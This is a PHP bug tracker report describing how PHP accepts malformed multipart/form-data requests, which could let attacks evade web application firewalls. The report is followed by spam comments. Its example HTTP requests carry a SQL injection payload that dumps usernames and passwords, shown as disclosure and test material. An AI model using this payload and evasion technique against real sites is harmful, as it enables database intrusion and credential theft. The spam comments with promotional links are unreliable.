php.net |  support |  documentation |  report a bug |  advanced search |  search howto |  statistics |  random bug |  login
Bug #81987 Incomplete Multipart/form-data but is passed to PHP
Submitted: 2023-03-10 16:08 UTC Modified: 2023-03-12 01:38 UTC
Votes:5
Avg. Score:4.6 ± 0.8
Reproduced:4 of 4 (100.0%)
Same Version:4 (100.0%)
Same OS:4 (100.0%)
From: me dot ekixu at gmail dot com Assigned:
Status: Open Package: HTTP related
PHP Version: Irrelevant OS: Linux
Private report: No CVE-ID: None
View Add Comment Developer Edit
Welcome! If you don't have a Git account, you can't do anything here.
You can add a comment by following this link or if you reported this bug, you can edit this bug over here.
(description)
Block user comment
Status: Assign to:
Package:
Bug Type:
Summary:
From: me dot ekixu at gmail dot com
New email:
PHP Version: OS:

 

 [2023-03-10 16:08 UTC] me dot ekixu at gmail dot com
Description:
------------
PHP passed Incomplete Multipart/form-data that conflicts with the requirements set by the RFC. It can cause WAF evasion.

As an example

```
POST / HTTP/1.1
User-Agent: Chrome/104.0.5112.102
Accept: */*
Host: 127.0.0.1:5980
Content-Length: 105
Content-Type:multipart/form-data;boundary=boundary

--boundary
Content-Disposition:name="id
1' union select 1,group_concat(user,0x3a,password) from users #
```

First according to RFC1867 there need a form-data token in Content-Disposition header 

Then A CRLF token to terminated sub-headers is excpet after Content-Disposition sub-header according to RFC1867

And The closing boundary which required by RFC1521 is also missing.

Not to mention that the name paramter have an unclosed quotation mark.

According to RFCs. A HTTP Request with multipart/form-data should like this

```
POST / HTTP/1.1
User-Agent: Chrome/104.0.5112.102
Cookie: PHPSESSID=r7kcra0ri3qln9hg7341loh3v7; security=low;
Accept: */*
Host: 127.0.0.1:5980
Content-Length: 130
Content-Type:multipart/form-data;boundary=boundary

--boundary
Content-Disposition:form-data;name="id"

1' union select 1,group_concat(user,0x3a,password) from users #
--boundary
```

However both of them can be passed by php server. As for SECURITY CONSIDERATIONS. It might be used by attack to bypass WAFs.(we had report this to related WAF vendors)





Test script:
---------------
We deploy the server behind nginx in php-fpm mode using docker-compose

```
version: '3'
services:
    web:
        image: nginx:latest
        ports:
            - "5980:80"
        volumes:
            - ./app:/home/wwwroot/
            - ./config/nginx/site.conf:/etc/nginx/conf.d/default.conf
        networks:
            - code-network
    php:
        image: php:7.4-fpm
        volumes:
            - ./app:/home/wwwroot/
        networks:
            - code-network
networks:
    code-network:
        driver: bridge
```

We've test php version from 5.6-fpm to the latest 8.2-fpm

And here is the server side script we used to detect $_POST values

```
<?php

var_dump("POST:",$_POST);
```



Expected result:
----------------
HTTP/1.1 200 OK
Server: nginx/1.23.3
Date: Fri, 10 Mar 2023 14:37:36 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Content-Length: 31

string(5) "POST:"
array(0) {
}


Actual result:
--------------
HTTP/1.1 200 OK
Server: nginx/1.23.3
Date: Fri, 10 Mar 2023 14:32:54 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Content-Length: 121

string(5) "POST:"
array(1) {
  ["id"]=>
  string(63) "1' union select 1,group_concat(user,0x3a,password) from users #"
}


Patches

christian.sewing (last revision 2023-03-13 05:34 UTC by christian dot sewing at db dot com)

Add a Patch

Pull Requests

Add a Pull Request

History

AllCommentsChangesGit/SVN commitsRelated reports
 [2023-03-12 01:38 UTC] stas@php.net
-Type: Security +Type: Bug
 [2023-03-13 05:34 UTC] christian dot sewing at db dot com
The following patch has been added/updated:

Patch Name: christian.sewing
Revision:   1678685649
URL:        https://bugs.php.net/patch-display.php?bug=81987&patch=christian.sewing&revision=1678685649
 [2023-05-02 12:23 UTC] kevinsanders at yahoo dot com
(https://www.linkedin.com/pulse/augusta-precious-metals-review-best-gold-ira-company-jeffrey-keever/)github.com
(https://www.linkedin.com/pulse/goldco-review-gold-ira-rollover-precious-metal-company-jeffrey-keever/)github.com
(https://www.linkedin.com/pulse/how-apply-employee-retention-credit-erc-complete-guide-jeffrey-keever/)github.com
(https://www.linkedin.com/pulse/best-gold-ira-companies-investment-retirement-accounts-jeffrey-keever/)github.com
(https://www.linkedin.com/pulse/ira-allowable-precious-metals-best-ira-approved-metal-jeffrey-keever/)github.com
(https://www.linkedin.com/pulse/roth-gold-ira-account-best-companies-how-works-jeffrey-keever/)github.com
(https://www.linkedin.com/pulse/what-employee-retention-tax-credit-ertc-jeffrey-keever/)github.com
(https://www.linkedin.com/pulse/best-precious-metals-ira-2023-jeffrey-keever/)github.com
(https://www.linkedin.com/pulse/best-silver-ira-companies-2023-jeffrey-keever/)github.com
(https://www.linkedin.com/pulse/how-protect-your-401k-from-market-crash-recession-jeffrey-keever/)github.com
(https://www.linkedin.com/pulse/goldco-vs-augusta-precious-metals-which-best-gold-ira-jeffrey-keever/)github.com
(https://www.linkedin.com/pulse/how-move-401k-gold-ira-without-penalty-jeffrey-keever/)github.com 
(https://www.linkedin.com/pulse/how-buy-physical-gold-your-401k-jeffrey-keever/)github.com
(https://www.linkedin.com/pulse/noble-gold-investments-review-jeffrey-keever/)github.com
(https://www.linkedin.com/pulse/best-paying-jobs-precious-metals-jeffrey-keever/)github.com
(https://www.linkedin.com/pulse/how-buy-gold-ira-jeffrey-keever-1e/)github.com
 [2023-07-22 14:48 UTC] forseobirdawade at gmail dot com
I am facing the same issue on site, do you know how to resolve it That was unpredicted. www.github.com (mykohlscard.pro/)
 [2023-12-21 08:53 UTC] Komal dot Shah dot ca08 at gmail dot com
I am facing the same issue on site, do you know how to resolve it That was unpredicted.
 [2023-12-21 08:55 UTC] Komal dot Shah dot ca08 at gmail dot com
I am facing the same issue on site, do you know how to resolve it That was unpredicted. www.github.com (hondafinance.online/)
 [2024-04-25 07:40 UTC] growthstarboard at gmail dot com
We only provide specific handling for older versions of OpenSSL; nonetheless, it ought to fail in a different manner.(https://github.com)(https://geometrydashworld.net)
 
PHP Copyright © 2001-2024 The PHP Group
All rights reserved.
Last updated: Mon May 20 13:01:34 2024 UTC